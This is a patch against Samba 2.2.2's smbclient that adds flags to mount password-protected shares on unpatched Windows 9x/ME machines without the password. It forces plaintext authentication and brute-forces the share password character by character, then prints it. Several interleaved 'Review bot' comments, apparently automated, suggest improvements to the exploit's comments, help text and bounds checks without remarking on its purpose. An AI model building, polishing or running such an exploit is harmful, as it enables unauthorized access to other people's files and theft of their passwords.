Patch against samba 2.2.2 which allows mounting of unpatched win 9x+me machines without knowing the password. There is an option to retrieve the password very quickly too, and another to switch between the two passwords if both read-only and read-write ones are present.
abb2ee0f8ddd2bad2811f283572a75c9f79c45d05546be94f9919f5d6ec132ae
diff -r -C 2 samba-2.2.2/source/client/client.c samba-2.2.2-peche/source/client/client.c
*** samba-2.2.2/source/client/client.c Sat Oct 13 23:09:19 2001
--- samba-2.2.2-peche/source/client/client.c Wed Jan 9 21:46:24 2002
***************
*** 28,31 ****
--- 28,37 ----
#endif
+ /* XILUN HACK */
+ static BOOL breakin;
+ static BOOL get_full_pwd;
+ static BOOL reversed_scan;
+ /* XILUN HACK */
+
struct cli_state *cli;
extern BOOL in_client;
***************
*** 1969,1972 ****
--- 1975,1984 ----
struct cli_state *do_connect(char *server, char *share)
{
+ /* XILUN HACK */
+ unsigned char scanpass[10];
+ int way;
+ int first_char;
+ int last_char;
+ /* XILUN HACK */
struct cli_state *c;
struct nmb_name called, calling;
***************
*** 2072,2079 ****
if (!cli_send_tconX(c, sharename, "?????",
password, strlen(password)+1)) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
}
--- 2084,2134 ----
if (!cli_send_tconX(c, sharename, "?????",
password, strlen(password)+1)) {
! /* XILUN HACK */
! if (!breakin) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else {
! BOOL found = False;
! c->sec_mode = 0; /**/
! if (reversed_scan) {
! way = -1; first_char = 0xFF; last_char = 0x20;
! } else {
! way = 1; first_char = 0x20; last_char = 0xFF;
! }
! if (get_full_pwd) {
! int deep;
! for (deep = 0; deep <= 8; deep++) scanpass[deep] = 0;
! for (deep = 0; deep <= 7; deep++) {
! scanpass[deep] = first_char - way;
! while (scanpass[deep] != last_char) {
! scanpass[deep]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, deep+1))
! { found = True; break; }
! }
! if (!found || cli_send_tconX(c, sharename,
! "?????", scanpass, deep+2))
! break;
! }
! } else {
! scanpass[0] = first_char - way;
! scanpass[1] = 0;
! while (scanpass[0] != last_char) {
! scanpass[0]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, 1))
! { found = True; break; }
! }
! }
! if (!found) {
! DEBUG(0,("Sorry you're dealing with a non broken smb server\n"));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else DEBUG(0,("(Partial) password found : %s\n",scanpass));
! }
! /* XILUN HACK */
}
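Review bot: The line `c->sec_mode = 0; /**/` carries an empty comment where the reason belongs; it overwrites the security mode the server negotiated, so every cli_send_tconX call that follows takes the unencrypted-password path in cliconnect.c, and that should be said at the site, e.g. `/* discard negotiated sec_mode: later tconX calls send the share password unencrypted */`. The result is then written with `DEBUG(0,("(Partial) password found : %s\n",scanpass));`, which puts a credential into whatever the level-0 debug output is routed to (terminal or log file); the comment should at least state that. do_connect starts and ends outside the hunk.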
***************
*** 2138,2141 ****
--- 2193,2201 ----
DEBUG(0,("\t-c command string execute semicolon separated commands\n"));
DEBUG(0,("\t-b xmit/send buffer changes the transmit/send buffer (default: 65520)\n"));
+ /* XILUN HACK */
+ DEBUG(0,("\t-w connect to host walking around the password\n"));
+ DEBUG(0,("\t-f display the host full password and connect\n"));
+ DEBUG(0,("\t-r use reverse order to scan the password\n"));
+ /* XILUN HACK */
DEBUG(0,("\n"));
}
***************
*** 2421,2426 ****
while ((opt =
! getopt(argc, argv,"s:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
case 's':
pstrcpy(servicesf, optarg);
--- 2481,2499 ----
while ((opt =
! getopt(argc, argv,"wfrs:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
+ /* XILUN HACK */
+ case 'w':
+ breakin = True;
+ break;
+ case 'f':
+ breakin = True;
+ get_full_pwd = True;
+ break;
+ case 'r':
+ breakin = True;
+ reversed_scan = True;
+ break;
+ /* XILUN HACK */
case 's':
pstrcpy(servicesf, optarg);
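Review bot: `case 'f'` and `case 'r'` each set `breakin = True` as a side effect, so -f and -r silently imply -w, while the usage lines added in the earlier hunk of this file present them as independent modifiers. The help text should say so, e.g. `DEBUG(0,("\t-f display the host full password and connect (implies -w)\n"));` and the same for -r, or the two cases should stop setting `breakin` so the flags compose explicitly. The switch and its enclosing option loop continue outside the hunk.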
diff -r -C 2 samba-2.2.2/source/libsmb/cliconnect.c samba-2.2.2-peche/source/libsmb/cliconnect.c
*** samba-2.2.2/source/libsmb/cliconnect.c Fri Jul 6 04:01:37 2001
--- samba-2.2.2-peche/source/libsmb/cliconnect.c Wed Jan 9 21:45:54 2002
***************
*** 256,260 ****
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
} else {
memcpy(pword, pass, passlen);
--- 256,263 ----
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! if (pass[passlen-1] == 0)
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
! else
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT);
} else {
memcpy(pword, pass, passlen);
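Review bot: The new condition reads `pass[passlen-1]` before anything in view establishes that passlen is at least 1, so a caller passing passlen == 0 would read one byte before the buffer; guard it with `if (passlen > 0 && pass[passlen-1] == 0)`. Both branches still hand -1 to clistr_push, so the number of bytes copied is derived from the NUL terminator of pass rather than from passlen — passlen now only decides whether the terminator is sent — and a one-line comment stating that would stop a reader assuming the copy is bounded by passlen. The enclosing function (apparently cli_send_tconX, judging by the caller in client.c) starts and ends outside the hunk.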